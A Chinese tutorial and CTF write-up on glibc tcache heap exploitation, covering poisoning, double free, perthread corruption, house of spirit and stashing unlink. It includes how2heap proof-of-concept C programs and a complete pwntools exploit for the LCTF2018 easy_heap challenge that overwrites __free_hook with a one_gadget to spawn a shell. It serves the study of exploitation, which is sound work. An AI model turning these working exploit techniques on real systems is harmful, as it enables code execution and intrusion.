欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Tcache Attack

程序员文章站 2022-05-14 17:17:33
...

tcache overview

tcache机制在libc2.26之后新增,可以说它是类似于fastbin的机制,LIFO,但比fastbin的优先级更高,由名字可以看出它相当于一个缓存的作用。先看关于它的两个结构体 tcache_entrytcache_perthread_struct(见glibc2.27源码):

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

可以看到tcache有一个next指针,指向下一个释放的tcache块,有定义TCACHE_MAX_BINS可知,最多有64个tcache bin,每个bin最多有7个tcache块:

#if USE_TCACHE
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

相关的两个重要函数实现从tcache取放chunk,tcache_get()tcache_put()

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

这两个函数会在init_free和__libc_malloc中调用,tcache_put分配大小不大于0x408且tchche bin未满时可调用,tcache_get也只检查了tc_idx是否合法,可看到就是链表删除和插入的操作,没有任何检查机制
关于tcache在申请和释放的时候,先检查对应大小的tcache有没有空闲,有就申请tcache,释放时也显示放到tcache,直到tcache满再依次按大小放入对应的bin中;若申请chunk时发现tcache相应位置有空闲,就将申请的chunk之后的chunk按照相应的便利方法加入到tcache。这里引用ctfwiki上的一段话:

内存申请: 在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。

(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin链上的其他内存块放入 tcache 中。

(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin链上的其他内存块放入 tcache 中。

(3)当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。

tcache 取出:在内存申请的开始部分,首先会判断申请大小块,在 tcache 是否存在,如果存在就直接从 tcache中摘取,否则再使用_int_malloc 分配。

在循环处理 unsorted bin 内存块时,如果达到放入 unsorted bin 块最大数量,会立即返回。默认是 0,即不存在上限。

#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
        && mp_.tcache_unsorted_limit > 0
        && tcache_unsorted_count > mp_.tcache_unsorted_limit)
      {
        return tcache_get (tc_idx);
      }
#endif

在循环处理 unsorted bin 内存块后,如果之前曾放入过 tcache 块,则会取出一个并返回。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
      {
        return tcache_get (tc_idx);
      }
#endif

pwn tcache

tcache poisoning(覆盖next指针)

通过覆盖next指针,实现malloc任意地址
条件:

  1. 有溢出,可覆盖next指针或UAF
  2. 需要知道目的地址(堆、栈、bss)
    可参考how2heap的例子调试。
    可以看出 tcache posioning 这种方法和 fastbin attack 类似,但因为没有 size 的限制有了更大的利用范围。

tcache dup(tcache的double free)

由于tcache在2.27-2.29上没有检测指针,可直接实现double free,比fastbin的double free好利用。
参考how2heap例子。
原理,将两个同样的chunk放入tcache,chunk1–>chunk1,先malloc chunk1,修改next指针为addr-anywhere使链表变为chunk1–>addr-anywhere,在经过两次malloc可申请到目标地址。然后可通过覆盖got表,修改函数指针达到利用目的。
条件:

  1. 需泄露地址(堆、栈、bss)、libc

tcache perthread corruption()

tcache_perthread_struct 结构体包含了tcache的所有相关指针,如果我们能控制该结构体,就可以越过malloc size限制,malloc到任何地址。引用ctfwiki上的图:

通过一些手段(如 tcache posioning),我们将其改为了

tcache_    +------------+<---------------------------+
\perthread |......      |                            |
\_struct   +------------+                            |
           |counts[i]   |                            |
           +------------+                            |
           |......      |          +----------+      |
           +------------+          |header    |      |
           |entries[i]  |--------->+----------+      |
           +------------+          |target    |------+
           |......      |          +----------+
           |            |          |          |
           +------------+          +----------+
这样,两次 malloc 后我们就返回了 tcache_perthread_struct 的地址,就可以控制整个 tcache 了。

条件:partial overwrite 部分覆盖

tcache house of spirit

参考how2heap源码调试。
原理:首先在栈(bss)上构造伪造的chunk,然后通过溢出修改pointer指针为伪造的栈地址,经过free后栈地址就会放入tcache,再次malloc对应大小就可控制该栈。

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
    fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

    fprintf(stderr, "Ok. Let's start with the example!.\n\n");


    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    unsigned long long fake_chunks[10]; //fake chunk region

    fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

    fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size


    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

smallbin unlink

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

tcache stashing unlink attack

这种攻击利用的是 tcache bin 有剩余 (数量小于 TCACHE_MAX_BINS ) 时,同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后会如果 tcache 仍有足够空闲位置,会将剩余的 small bin 链入 tcache ,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时,其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。
参见how2heap例子。

#include <stdio.h>
#include <stdlib.h>

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
    fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
    fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

    // stack_var emulate the fake_chunk we want to alloc to
    fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
    fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

    stack_var[3] = (unsigned long)(&stack_var[2]);

    fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    //put 7 tcache
    fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    //convert into small bin
    fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);//>0x90

    //now 5 tcache bins
    fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    //trigger the attack
    fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);

    fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    //malloc and return our fake chunk on stack
    target = malloc(0x90);   

    fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
    return 0;
}

效果:fakechunk->bk+0x10处会写入libc地址。
原理方法:

  1. 构造fake chunk(stack_var[3] = (unsigned long)(&stack_var[2])这里&stack_var[2]代表可写地址)bypass bck->fd = bin in glibc
  2. 申请9个0x90chunk,然后free7个(3-8、1)填满tcache,free(0)、free(2)到unsortedbin
  3. 申请size>0x90 如0xa0,此时会匹配unstoredbin无匹配,会将unsortedbin 2->0 放入smallbin 2->0
  4. malloc两个tcache给之后free 的smallbin腾出位置
  5. 修改smallbin 2的bk为fake_chunk_addr
  6. calloc会从smallbin中匹配,匹配到chunk0,将其(fakechunk->chunk0)返回给用户,其余的链入tcache,根据smallbin由bk遍历,所以链入tcache顺序为fakechunk->chunk0
  7. 随后malloc将fakechunk申请出来

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制),假设 tcache[sz] 中有 5 个空闲堆块,则有足够的位置容纳 chunk1 以及 fake_chunk。
在源码的检查中,只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim),后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ,所以位于 fake_chunk->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户,同时,由于bin->bk(writeable_addr) = bck;bck->fd(writeable_addr->fd) = bin; 的 unlink 操作,会使得 writable_addr+0x10 处被写入一个 libc 地址。

tcache check

glibc2.27没有对tcache double free做检测,但是我最近针对glibc2.27的tcache出了一个pwn题,远程搭建环境ubuntu18.04 glibc2.27但是出现了double free检测,不知道为啥,以后再补!
wiki相关源码摘要:

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
 {
   tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
   assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
   e->next = tcache->entries[tc_idx];
   tcache->entries[tc_idx] = e;
   ++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
   assert (tcache->entries[tc_idx] > 0);
   tcache->entries[tc_idx] = e->next;
   --(tcache->counts[tc_idx]);
+  e->key = NULL;
   return (void *) e;
 }

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
   {
     size_t tc_idx = csize2tidx (size);

+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache))
+      {
+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+
     if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)

LCTF2018 PWN easy_heap

题目+源码+exp
保护全开,添加功能出现null-byte-overflow,可覆盖下个chunk的pre_inuse末位。
利用思路:制造tcache的double free实现任意地址写。通过unsortedbin合并修改

  1. 制造三个unsortedbin A、B、C,依次释放
  2. A、B合并,C的pre_size为0x200
  3. A、B、C合并,C的pre_size仍为0x200
  4. 将A分配、B、C分配出去,不要覆盖到0x200
  5. 将B释放到tcache头,再将A释放,使得fd、bk为libc指针
  6. 分配B溢出使得C的pre_inuse位为0,此时A(free)–B(allocated)–C(allocated)
  7. free(C)使得ABC合成大块,B在使用。
  8. 分配A,使得fd的libc地址落入B中,而B恰好在使用,可以输出,从而泄露libc
  9. 此时B已经在使用且有指向,此时再分配一个指针指向B,B就有两个指向,然后将其free掉,构造tcache的double free
  10. 修改free hook为onegadget得到shell。
    过程中注意tcache的影响。
    借用ctfwiki上的图:
    1-3步骤:
+-----+
|     | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块
+-----+
|  A  | <-- 3 个 unsorted bin 块
+-----+
|  B  |
+-----+
|  C  |
+-----+
|     | <-- tcache 块,防止 top 合并
+-----+
| top |
|  .. |

4-5步骤:

+-----+
|     | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+
|  A  | <-- free
+-----+
|  B  | <-- free 且为 tcache 块
+-----+
|  C  |
+-----+
|     | <-- tcache 块,防止 top 合并
+-----+
| top |
|  .. |

6-7步骤:

+-----+
|     | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+                     --------+
|  A  | <-- free 大块               |
+-----+                             |
|  B  | <-- 已分配          --------+--> 一个大 free 块
+-----+                             |
|  C  | <-- free                    |
+-----+                     --------+
|     | <-- tcache 块,防止 top 合并 (free)
+-----+
| top |
|  .. |

8-9步骤:

+-----+
|     | <-- tcache perthread 结构体
+-----+
| ... | <-- 6 个 tcache 块 (free)
+-----+
|  A  | <-- 已分配
+-----+
|  B  | <-- 已分配          --------+> 一个大 free 块
+-----+                             |
|  C  | <-- free                    |
+-----+                     --------+
|     | <-- tcache 块,防止 top 合并 (free)
+-----+
| top |
|  .. |

exp:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
import sys
import os
import os.path
from pwn import *
context(os='linux', arch='amd64', log_level='debug')

p = process('./easy_heap')

def cmd(idx):
    p.recvuntil('>')
    p.sendline(str(idx))


def new(size, content):
    cmd(1)
    p.recvuntil('>')
    p.sendline(str(size))
    p.recvuntil('> ')
    if len(content) >= size:
        p.send(content)
    else:
        p.sendline(content)


def delete(idx):
    cmd(2)
    p.recvuntil('index \n> ')
    p.sendline(str(idx))


def show(idx):
    cmd(3)
    p.recvuntil('> ')
    p.sendline(str(idx))
    return p.recvline()[:-1]


def main():
    # Your exploit script goes here

    # step 1: get three unsortedbin chunks
    # note that to avoid top consolidation, we need to arrange them like:
    # tcache * 6 -> unsortd  * 3 -> tcache
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    for i in range(3):
        new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks

    # arrange:
    for i in range(6):
        delete(i)
    delete(9)
    for i in range(6, 9):
        delete(i)

    # step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    # rearrange to take second unsorted bin into tcache chunk, but leave first 
    # unsorted bin unchanged
    new(0x10, '7 - first')
    new(0x10, '8 - second')
    new(0x10, '9 - third')

    for i in range(6):
        delete(i)
    # move second into tcache
    delete(8)
    # delete first to provide valid fd & bk
    delete(7)

    new(0xf8, '0 - overflow')
    # fill up tcache
    delete(6)

    # trigger
    delete(9)

    # step 3: leak, fill up 
    for i in range(7):
        new(0x10, str(i) + ' - tcache')
    new(0x10, '8 - fillup')

    libc_leak = u64(show(0).strip().ljust(8, '\x00'))
    p.info('libc leak {}'.format(hex(libc_leak)))
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libc.address = libc_leak - 0x3ebca0

    # step 4: constrecvuntilct UAF, write into __free_hook
    new(0x10, '9 - next')
    # these two provides sendlineots for tcache
    delete(1)
    delete(2)

    delete(0)
    delete(9)
    new(0x10, p64(libc.symbols['__free_hook'])) # 0
    new(0x10, '/bin/sh\x00into target') # 1
    one_gadget = libc.address + 0x4f322 
    new(0x10, p64(one_gadget))

    # system("/bin/sh\x00")
    delete(1)

    p.interactive()

if __name__ == '__main__':
    main()